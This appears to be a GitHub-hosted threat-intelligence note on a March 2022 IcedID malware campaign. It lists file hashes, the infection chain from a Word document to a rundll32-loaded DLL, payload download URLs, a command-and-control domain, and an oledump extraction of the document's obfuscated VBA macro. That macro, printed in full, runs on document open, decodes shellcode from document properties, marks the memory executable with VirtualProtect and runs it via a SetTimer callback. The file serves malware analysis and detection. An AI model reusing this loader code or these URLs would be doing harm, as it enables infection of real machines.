-
Notifications
You must be signed in to change notification settings - Fork 5
/
icedID_22.03.2022.txt
115 lines (98 loc) · 5.57 KB
/
icedID_22.03.2022.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
IcedID | 22.03.2022 | Campaign 1832122140
***************************************
.doc 0f3ea635c48dba38f3602aa302e2581fef545372e81a5e372d68ca709f2db7f9
.doc c19c503511f574ffb7bebeb8985561e06101719c935fc9f61dd9960483d5bfd8
.dll 98b3471ac865e7cc6cc5712ab0db76c476fd861828267284a6aa40c802737b2e
***************************************
Exec >> .doc > .dll
WINWORD.EXE /n C:\Users\Admin\AppData\Local\Temp\request.docm
http://documentseu.top/kdv/FzxkjAN7rH2wzjPOcJ9iIa81gr2-znNH9wfxw14Q/
http://documentseu.top/kdv/khxOqk77P1SsQQIgOJc07dm-FoL9L0eZKwyaYc3p/
C:\Windows\splwow64.exe 12288
rundll32 C:\Users\Admin\AppData\Local\Temp\y3B5C.tmp.dll,DllRegisterServer
rundll32 C:\Users\Admin\AppData\Local\Temp\y3B5C.tmp.dll",DllRegisterServer
C:\Windows\system32\WerFault.exe -u -p 988 -s 168
c2'
http://golinisye.top/
***************************************
oledump.py -s 3 -v request.doc
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function UnperceptualSurgical Lib "user32" Alias "SetTimer" (ByVal CeciliaSubventralQuodlibetarian As LongPtr, ByVal AndropetalarSeparationismTransiliac As LongPtr, ByVal ExaggeratinglySaintism As LongPtr, ByVal CordewaneCourtierism As LongPtr) As LongPtr
Private Declare PtrSafe Function NitpickersUnintombed Lib "user32" Alias "KillTimer" (ByVal ThirdlyKopagmiut As LongPtr, ByVal NondisarmamentShrivellingTemptingness As LongPtr) As LongPtr
Private Declare PtrSafe Function ProofreadingFallalery Lib "kernel32" Alias "VirtualProtect" (ByVal CarburizeEudemonistically As LongPtr, ByVal UntritelyKinetomeric As LongPtr, ByVal MedallaryTimeworkerJinrikisha As LongPtr, MatronaliaGigantostracous As LongPtr) As LongPtr
#Else
Private Declare Function UnperceptualSurgical Lib "user32" Alias "SetTimer" ( ByVal ChoreographySistrurusUnintoxicating As Long, ByVal VerbenasApennines As Long, ByVal BrominHalicarnassian As Long, ByVal WantonerAraliaceousGadolinia As Any) As Long
Private Declare Function NitpickersUnintombed Lib "user32" Alias "KillTimer" ( ByVal SubnarcoticPseudoaestheticSniggeringly As Long, ByVal ThromboclasisWondercraft As Long) As Long
Private Declare Function ProofreadingFallalery Lib "kernel32" Alias "VirtualProtect" (ByVal OverpiousnessDividedly As Long, ByVal SclerificationDelocalizationWhinnel As Long, ByVal SailfishLententideHeavyset As Long, NarcobatusUpsilons As Long) As Long
#End If
Private Sub Document_Open()
AntisidericCretinBonhomie
End Sub
Public Function hoCHrGBZH(strInput)
hoCHrGBZH = StrReverse(ActiveDocument.CustomDocumentProperties(strInput))
End Function
Private Sub AntisidericCretinBonhomie()
Dim EndorserMavourneen() As Byte
#If Win64 Then
EndorserMavourneen = RenovizeSpectrophotometerPsoai(ActiveDocument.BuiltInDocumentProperties(hoCHrGBZH("ZTaqhc9jX")).Value)
#Else
EndorserMavourneen = RenovizeSpectrophotometerPsoai(ActiveDocument.BuiltInDocumentProperties(hoCHrGBZH("gIU5oWu8r")).Value)
#End If
#If VBA7 Then
Dim ColostomiesExcitesAnalogions As LongPtr
Dim StayableTitanosilicate As LongPtr
Dim shellCode As LongPtr
Dim ExpatiationMonorailroad As LongPtr
#Else
Dim ColostomiesExcitesAnalogions As Long
Dim StayableTitanosilicate As Long
Dim shellCode As Long
Dim ExpatiationMonorailroad As Long
#End If
StayableTitanosilicate = UBound(EndorserMavourneen) + 1
shellCode = VarPtr(EndorserMavourneen(0))
ProofreadingFallalery shellCode, StayableTitanosilicate, 64, VarPtr(ColostomiesExcitesAnalogions)
GetObject(hoCHrGBZH("zFrJxQ__yDJx")).Environment(hoCHrGBZH("vcDz__"))(hoCHrGBZH("WqQLObjnCSb")) = hoCHrGBZH("q2rYW_M")
ExpatiationMonorailroad = UnperceptualSurgical(0, shellCode, 1, shellCode)
UndeludingSectionality 1
NitpickersUnintombed 0, ExpatiationMonorailroad
GetObject(hoCHrGBZH("gwNLW1Bay4")).Environment(hoCHrGBZH("ScmozQXgoo4ly")).Remove (hoCHrGBZH("cKK3lrHG"))
ReDim EndorserMavourneen(1)
End Sub
Sub UndeludingSectionality(Finish)
Dim HypothecatingSickle As Long
Dim ChorepiscopeQuotiesTorsks As Long
ChorepiscopeQuotiesTorsks = Timer() + (Finish)
Do
HypothecatingSickle = Timer()
DoEvents
Loop Until HypothecatingSickle > ChorepiscopeQuotiesTorsks
End Sub
Function HackberriesZaninesses(AnatomicobiologicalRattlyPharyngopathy, ReaccumulatingCyanids)
HackberriesZaninesses = Mid(AnatomicobiologicalRattlyPharyngopathy, ReaccumulatingCyanids + 1, 1)
End Function
Function FrostinessHomotonousCalmingly(FirebratsIdolisedUnerrableness) As Long
If Int(Rnd(23)) > 2 Then
FrostinessHomotonousCalmingly = 9000
Else
FrostinessHomotonousCalmingly = Len(FirebratsIdolisedUnerrableness)
End If
End Function
Function RenovizeSpectrophotometerPsoai(AlgesiometerFerrotungstenScleria)
ReDim ShotmakerBumbler(FrostinessHomotonousCalmingly(AlgesiometerFerrotungstenScleria) - 1) As Byte
Dim EnharmonicCompunctionaryCichlidae As Long, BromomenorrheaUndefiniteQuadraphonics As Long
Dim AxiomaticalNondeprecatingly: AxiomaticalNondeprecatingly = hoCHrGBZH("ePyzXTjr") & hoCHrGBZH("vq4yNZ0riO")
For EnharmonicCompunctionaryCichlidae = 0 To FrostinessHomotonousCalmingly(AlgesiometerFerrotungstenScleria) - 1 Step 2
BromomenorrheaUndefiniteQuadraphonics = EnharmonicCompunctionaryCichlidae / 2
ShotmakerBumbler(BromomenorrheaUndefiniteQuadraphonics) = CDec(AxiomaticalNondeprecatingly & HackberriesZaninesses(AlgesiometerFerrotungstenScleria, EnharmonicCompunctionaryCichlidae) & HackberriesZaninesses(AlgesiometerFerrotungstenScleria, EnharmonicCompunctionaryCichlidae + 1))
Next
RenovizeSpectrophotometerPsoai = ShotmakerBumbler
End Function